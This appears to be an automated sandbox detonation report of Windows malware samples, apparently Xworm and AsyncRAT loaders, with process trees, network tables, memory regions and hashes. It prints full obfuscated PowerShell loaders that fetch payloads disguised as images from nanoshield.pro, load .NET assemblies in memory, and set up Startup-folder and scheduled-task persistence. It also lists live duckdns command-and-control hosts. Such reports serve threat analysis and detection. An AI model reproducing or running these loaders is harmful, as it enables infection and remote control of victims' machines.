gTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreQQBjDgTreGQDgTreZDgTreBnDgTreG8DgTreaQDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.Acddgoi/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs'"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 172.67.203.108:443 | nanoshield.pro | tcp |
| US | 8.8.8.8:53 | 108.203.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 23.53.113.159:80 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
Files
memory/2116-0-0x00000230643E0000-0x0000023064402000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_omfb5zsh.ke4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2116-10-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp
memory/2116-12-0x0000023062230000-0x0000023062240000-memory.dmp
memory/2116-11-0x0000023062230000-0x0000023062240000-memory.dmp
memory/1464-13-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp
memory/1464-23-0x0000018E8C5E0000-0x0000018E8C5F0000-memory.dmp
memory/1464-24-0x0000018E8C5E0000-0x0000018E8C5F0000-memory.dmp
memory/1464-25-0x0000018E8C5E0000-0x0000018E8C5F0000-memory.dmp
memory/1464-26-0x0000018E8C570000-0x0000018E8C5BE000-memory.dmp
memory/3596-32-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp
memory/3596-37-0x00000252F6B00000-0x00000252F6B10000-memory.dmp
memory/3596-38-0x00000252F6B00000-0x00000252F6B10000-memory.dmp
memory/3596-45-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 48874fdc03476cb442d506f5bb796f70 |
| SHA1 | 2dedcc271d935fe842f7cb4cc03873b6f688d29d |
| SHA256 | 15717634eff02490a9e8a4606a3cc8d61876a9efa01b42d6c8bf442bcf8718e0 |
| SHA512 | 31b5539304c0ad1f781407a60ff019c30192b2fe3e7bd64bf7dc3d5a9263eae6874c8ef960998900d1322d358e38f9eadba40945958fb6ff7719cd1a24644671 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
memory/1464-49-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5caad758326454b5788ec35315c4c304 |
| SHA1 | 3aef8dba8042662a7fcf97e51047dc636b4d4724 |
| SHA256 | 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391 |
| SHA512 | 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693 |
memory/2116-52-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
122s
Max time network
150s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2972 set thread context of 2984 | N/A | C:\Users\Admin\AppData\Local\Temp\fresh.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fresh.exe
"C:\Users\Admin\AppData\Local\Temp\fresh.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Local\Temp\bddddsx"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C copy "C:\Users\Admin\AppData\Local\Temp\fresh.exe" "C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | vbdsg.duckdns.org | udp |
| GB | 57.128.155.22:8896 | vbdsg.duckdns.org | tcp |
Files
memory/2972-0-0x00000000002B0000-0x00000000002DE000-memory.dmp
memory/2972-1-0x0000000074110000-0x00000000747FE000-memory.dmp
memory/2972-2-0x0000000004A80000-0x0000000004AC0000-memory.dmp
memory/2984-3-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2984-4-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2984-6-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2984-5-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2984-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2984-9-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2984-11-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2984-13-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2972-16-0x0000000074110000-0x00000000747FE000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd';$yqWK='LiJdgoadiJdg'.Replace('iJdg', ''),'ChBhSSaBhSSngBhSSeExBhSStBhSSenBhSSsBhSSioBhSSnBhSS'.Replace('BhSS', ''),'CopkoQeyTkoQeokoQe'.Replace('koQe', ''),'DerzLocrzLoomprzLoresrzLosrzLo'.Replace('rzLo', ''),'GQRxjetCQRxjurQRxjrenQRxjtPQRxjrQRxjocQRxjeQRxjssQRxj'.Replace('QRxj', ''),'FrBKzDomBBKzDaBKzDseBKzD6BKzD4SBKzDtrBKzDinBKzDgBKzD'.Replace('BKzD', ''),'SzuQcplzuQcitzuQc'.Replace('zuQc', ''),'ECcAUnCcAUtrCcAUyPCcAUoCcAUinCcAUtCcAU'.Replace('CcAU', ''),'RhWnpeahWnpdhWnpLihWnpnhWnpehWnpshWnp'.Replace('hWnp', ''),'ElTwQcemeTwQcntTwQcAtTwQc'.Replace('TwQc', ''),'CrerpgJatrpgJeDerpgJcrrpgJyrpgJptrpgJorrpgJ'.Replace('rpgJ', ''),'TraUhnCnsfUhnCoUhnCrmFUhnCinUhnCalUhnCBloUhnCckUhnC'.Replace('UhnC', ''),'MkqpgaikqpgnMkqpgokqpgdulkqpgekqpg'.Replace('kqpg', ''),'InNqdDvNqdDokeNqdD'.Replace('NqdD', '');powershell -w hidden;function iZOzL($TzqHY){$CRDEw=[System.Security.Cryptography.Aes]::Create();$CRDEw.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CRDEw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CRDEw.Key=[System.Convert]::($yqWK[5])('Y7IdTi6kX5lJbhqYY9FqtDytubVi34n2yBW8Q4423Ak=');$CRDEw.IV=[System.Convert]::($yqWK[5])('tLQNTWTubc+g+4ALClBhsw==');$AoFaY=$CRDEw.($yqWK[10])();$bufIb=$AoFaY.($yqWK[11])($TzqHY,0,$TzqHY.Length);$AoFaY.Dispose();$CRDEw.Dispose();$bufIb;}function xWxTo($TzqHY){$cdgLK=New-Object System.IO.MemoryStream(,$TzqHY);$cQORb=New-Object System.IO.MemoryStream;$eSUCm=New-Object System.IO.Compression.GZipStream($cdgLK,[IO.Compression.CompressionMode]::($yqWK[3]));$eSUCm.($yqWK[2])($cQORb);$eSUCm.Dispose();$cdgLK.Dispose();$cQORb.Dispose();$cQORb.ToArray();}$nXsEX=[System.IO.File]::($yqWK[8])([Console]::Title);$MCbHr=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 5).Substring(2))));$nFODc=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 6).Substring(2))));[System.Reflection.Assembly]::($yqWK[0])([byte[]]$nFODc).($yqWK[7]).($yqWK[13])($null,$null);[System.Reflection.Assembly]::($yqWK[0])([byte[]]$MCbHr).($yqWK[7]).($yqWK[13])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.40.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bagdg.duckdns.org | udp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| US | 8.8.8.8:53 | bagdg.duckdns.org | udp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| US | 8.8.8.8:53 | bagdg.duckdns.org | udp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
Files
memory/3964-0-0x0000000002AF0000-0x0000000002B26000-memory.dmp
memory/3964-1-0x0000000075380000-0x0000000075B30000-memory.dmp
memory/3964-3-0x0000000005020000-0x0000000005030000-memory.dmp
memory/3964-2-0x0000000005020000-0x0000000005030000-memory.dmp
memory/3964-4-0x0000000005660000-0x0000000005C88000-memory.dmp
memory/3964-5-0x0000000005460000-0x0000000005482000-memory.dmp
memory/3964-6-0x0000000005D40000-0x0000000005DA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5rillfw.try.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3964-7-0x0000000005DB0000-0x0000000005E16000-memory.dmp
memory/3964-17-0x0000000005F00000-0x0000000006254000-memory.dmp
memory/3964-18-0x0000000006310000-0x000000000632E000-memory.dmp
memory/3964-19-0x0000000006340000-0x000000000638C000-memory.dmp
memory/3964-20-0x0000000006890000-0x00000000068D4000-memory.dmp
memory/3964-21-0x0000000007420000-0x0000000007496000-memory.dmp
memory/3964-22-0x0000000007D20000-0x000000000839A000-memory.dmp
memory/3964-23-0x00000000076C0000-0x00000000076DA000-memory.dmp
memory/4204-24-0x0000000075380000-0x0000000075B30000-memory.dmp
memory/4204-25-0x0000000005240000-0x0000000005250000-memory.dmp
memory/4204-26-0x0000000005240000-0x0000000005250000-memory.dmp
memory/4204-38-0x0000000075380000-0x0000000075B30000-memory.dmp
memory/3964-39-0x0000000005190000-0x00000000051A4000-memory.dmp
memory/3964-41-0x00000000051B0000-0x00000000051C2000-memory.dmp
memory/3964-40-0x00000000051A0000-0x00000000051AE000-memory.dmp
memory/3964-43-0x0000000075380000-0x0000000075B30000-memory.dmp
memory/3964-44-0x0000000005020000-0x0000000005030000-memory.dmp
memory/3964-45-0x0000000005020000-0x0000000005030000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
122s
Max time network
127s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\payload.ps1
Network
Files
memory/1456-4-0x000000001B360000-0x000000001B642000-memory.dmp
memory/1456-5-0x0000000001DE0000-0x0000000001DE8000-memory.dmp
memory/1456-6-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
memory/1456-7-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-8-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-9-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-10-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
memory/1456-11-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-12-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
memory/1456-13-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-14-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-15-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-16-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
memory/1456-17-0x0000000002B00000-0x0000000002B80000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
110s
Max time network
187s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3604 created 3500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
Xworm
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\payload.ps1
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
